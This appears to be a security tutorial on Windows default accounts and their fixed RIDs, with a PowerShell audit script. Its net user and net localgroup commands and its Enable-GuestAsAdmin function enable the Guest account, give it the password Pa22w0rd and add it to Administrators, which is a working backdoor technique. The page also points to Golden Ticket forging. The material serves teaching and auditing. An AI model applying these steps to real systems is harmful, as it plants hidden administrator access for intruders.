Both Windows and Active Directory ship with a number of built-in (default) accounts, such as Administrator, Guest and DefaultAccount on every Windows host and krbtgt on domain controllers. They cannot be deleted, although they can be renamed and, in most cases, disabled; Guest and DefaultAccount are disabled out of the box but can be re-enabled. Every default account has a fixed relative identifier (RID), the last component of its security identifier (SID), that never changes even if the account is renamed: Administrator is always RID 500, Guest 501, krbtgt 502 and DefaultAccount 503. This makes them immediately identifiable, to an attacker and to a defender alike; renaming Administrator hides nothing from anyone who can enumerate SIDs. Even low-privileged default accounts are dangerous, because they provide a foothold on the system from which privileges can be escalated. The following table summarizes common ways to exploit default Windows accounts.
Note: Golden Tickets are forged Kerberos ticket-granting tickets created from the krbtgt account's password hash. For more information on creating them, see https://pentestlab.blog/tag/krbtgt and https://pentestlab.blog/2018/04/09/golden-ticket.
Windows Account Manipulation
Accounts (including Guest and DefaultAccount) can be manipulated using the net user and net localgroup commands. Here are some examples. Listing accounts and reading their status works from any user context; enabling an account, changing its password or altering group membership requires an elevated (Administrator) or SYSTEM prompt.
To Do This Action:                                      Run This Command:
List all local users                                    net user
See information about guest                             net user guest
Check whether guest is active (enabled) or not          net user guest | findstr /C:"active"
Activate (enable) guest                                 net user guest /active:yes
Set/change the guest password to Pa22w0rd               net user guest Pa22w0rd
Add guest to the local Administrators group             net localgroup administrators guest /add
View the SID of each local account                      wmic useraccount get name,sid

Note: the net commands take the account name before the option (net localgroup administrators guest /add, not /add guest). The new password must satisfy the local password policy or net user fails with a "password does not meet the password policy requirements" error. The findstr check matches the "Account active" line of the net user output. WMIC is deprecated in current Windows releases; in PowerShell, Get-LocalUser | Select-Object Name,SID returns the same name-to-SID mapping.
Note: For information about default accounts/groups and their SID numbers, see https://support.microsoft.com/en-us/help/243330/well-known-security-identifiers-in-windows-operating-systems
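The following PowerShell script is an added example and is not code from the original page. It shows the point made above about default accounts being identifiable by RID even after they have been renamed, and it reproduces the table's enable / set-password / add-to-Administrators sequence with the Microsoft.PowerShell.LocalAccounts cmdlets (Get-LocalUser, Set-LocalUser, Enable-LocalUser, Get-LocalGroupMember, Add-LocalGroupMember) instead of net.exe. The function names Get-Rid, Get-DefaultLocalAccounts and Enable-GuestAsAdmin, the -Password parameter and the $WellKnownRids table are my own; the RID values in the table are the documented well-known ones, and krbtgt (RID 502) is left out because it exists only in Active Directory, never in the local SAM.

```powershell
# Added example (not from the original page). Audits built-in local accounts
# by RID and reproduces the table's enable/password/admin steps with the
# Microsoft.PowerShell.LocalAccounts cmdlets (Windows 10 / Server 2016+).
# The modifying steps need an elevated (Administrator) or SYSTEM prompt.

# Well-known RIDs, i.e. the last component of the SID. Windows fixes these;
# only the account NAME can be changed, so a renamed Administrator is still RID 500.
# krbtgt (RID 502) lives only in Active Directory, never in the local SAM.
$WellKnownRids = @{
    500 = 'Administrator'
    501 = 'Guest'
    503 = 'DefaultAccount'
    504 = 'WDAGUtilityAccount'
}

function Get-Rid {
    # Returns the RID (last dash-separated component) of a SID string.
    param([Parameter(Mandatory)][string]$Sid)
    $parts = $Sid -split '-'
    return [int]$parts[-1]
}

function Get-DefaultLocalAccounts {
    # Lists every local account whose RID is well-known, with its current name,
    # whether it has been renamed, whether it is enabled, and whether it sits in
    # the local Administrators group. Membership is compared by SID, not name.
    $adminSids = Get-LocalGroupMember -Group 'Administrators' |
        ForEach-Object { $_.SID.Value }

    foreach ($user in Get-LocalUser) {
        $rid = Get-Rid -Sid $user.SID.Value
        if (-not $WellKnownRids.ContainsKey($rid)) { continue }
        [pscustomobject]@{
            CurrentName = $user.Name
            BuiltInName = $WellKnownRids[$rid]
            RID         = $rid
            SID         = $user.SID.Value
            Renamed     = ($user.Name -ne $WellKnownRids[$rid])
            Enabled     = $user.Enabled
            IsAdmin     = ($adminSids -contains $user.SID.Value)
        }
    }
}

function Enable-GuestAsAdmin {
    # Same effect as the rows "net user guest Pa22w0rd", "net user guest /active:yes"
    # and "net localgroup administrators guest /add" in the table above.
    # The account is located by RID 501, so it is found even if it was renamed.
    # -Password is a parameter name chosen for this example (hypothetical).
    param([Parameter(Mandatory)][string]$Password)

    $guest = Get-LocalUser | Where-Object { (Get-Rid -Sid $_.SID.Value) -eq 501 }
    if (-not $guest) { throw 'No local account with RID 501 (Guest) found' }

    # The password must satisfy the local password policy or Set-LocalUser fails.
    $secure = ConvertTo-SecureString -String $Password -AsPlainText -Force
    Set-LocalUser    -SID $guest.SID -Password $secure
    Enable-LocalUser -SID $guest.SID

    # Add-LocalGroupMember errors if the principal is already a member, so check first.
    $already = Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $_.SID.Value -eq $guest.SID.Value }
    if (-not $already) {
        Add-LocalGroupMember -Group 'Administrators' -Member $guest
    }

    # Return the audit row for RID 501 so the caller can confirm the new state.
    return (Get-DefaultLocalAccounts | Where-Object { $_.RID -eq 501 })
}

# Usage (run from an elevated prompt):
#   Get-DefaultLocalAccounts | Format-Table -AutoSize
#   Enable-GuestAsAdmin -Password 'Pa22w0rd'
```

Running Get-DefaultLocalAccounts on its own is a useful defensive check: a row with Renamed set to True tells you the built-in account has been renamed, and Enabled/IsAdmin set to True on the RID 501 row is exactly the end state the table's commands produce.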